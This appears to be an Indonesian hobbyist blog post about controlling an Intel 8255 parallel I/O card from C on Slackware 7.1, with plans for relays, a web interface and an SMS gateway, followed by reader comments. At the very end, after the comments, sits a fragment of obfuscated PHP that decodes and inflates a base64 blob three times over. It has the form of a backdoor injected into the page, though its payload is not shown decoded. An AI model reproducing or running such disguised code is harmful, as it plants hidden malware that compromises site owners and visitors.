Delicious

Archives

Categories

Intel 8255 on Slackware 7.1

  ozzie / 29/08/2007


Mungkin Teknologinya udah Basi kali yak?? dibanding sekarang yang lebih ke USB, tapi sekedar Refreshing dan kebetulan masih ada yg jual di Glodok..
8255
FYI: http://dt-51.com/.

Past: Pada masa kejayaannya. PPI8255 cukup naik daun karena compatible dengan berbagai bahasa programming yang berjalan pada platform Windows. seperti Assembler, C, Pascal, Basic hingga Delphi..

Today: Berhubung Sekarang ngoprek nya pake Slackware 7.1 di kernel 2.4.18 yang arsitektur kernelnya Sangat berbeda ama win32. maka dibutuhkan tenaga, waktu, pikiran, kopi, rokok ekstra. dan sekian lama browsing akhirnya dapet module disa8255 buat linux. coba-coba hijrah ke FreeBSD ternyata lebih ribet pake /dev/pbio ..

untuk sementara output dari DB-25 nya di gabungin ke project-board dulu, sekalian ngoprek di sisi program. yang kebetulan ngopreknya pake bahasa C. dari coba yang console [Command Line Interface], coba bikin shell sendiri berbasis TCL, ampe dicampur Dialog. beranjak ke X digabungin ama TCL/TK. dan sekarang pengennya Manageable ke arah Web-Based dengan campuran sedikit AJAX

Future: Keluar dari DB-25 kan jadi 3 port yang masing2 ada 8. kebetulan Port A & Port B sebagai Output. dan port C sebagai Input .. mo di gabungin ama modulenya Relay-Board.. tinggal output dari relay disambung ke rumah kabel di gudang. lalu setelah protocol HTTP-nya up, yang penting bisa POST ama GET tinggal setup SMS-Gateway dah. pake Kannel juga udah cukup. tinggal banyakin ajah sms-service nya itung2 port-forwarding

http://blog.ozzie.web.id/?p=128


« »


5 Responses to “Intel 8255 on Slackware 7.1”

  1. Michael D Says:

    Jadi inget project PPI 8255 waktu kuliah dulu :P
    Cuman 8255 dihubungin ama mikrokontroler.

    Oprekan basis ncurse (??) oke juga ! Simple but tokcer Hehehe

  2. Fajri Says:

    Gilee om..keren bnget…
    siip dah keren bnget…
    sukses buat lo Om..
    gw binun Ji..kaga ngerti..
    mklum newbie abiss..

  3. Moh. jasri Says:

    Terima kasih tentang penjelasan PPI8255nya, kalau bisa kirimi aq pemjelasan lebih lanjut tentang PPI255. terima kasih.

  4. irul Says:

    It’s done om, pake parallel port tapi :D

  5. meyer Says:

    keren bgt tuh..ampe gw gag ngerti..hehe
    bang gman seh listing program bahasa C untuk interface 2 buah PPI 8255 dengan slot ISA..
    Cayo..


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>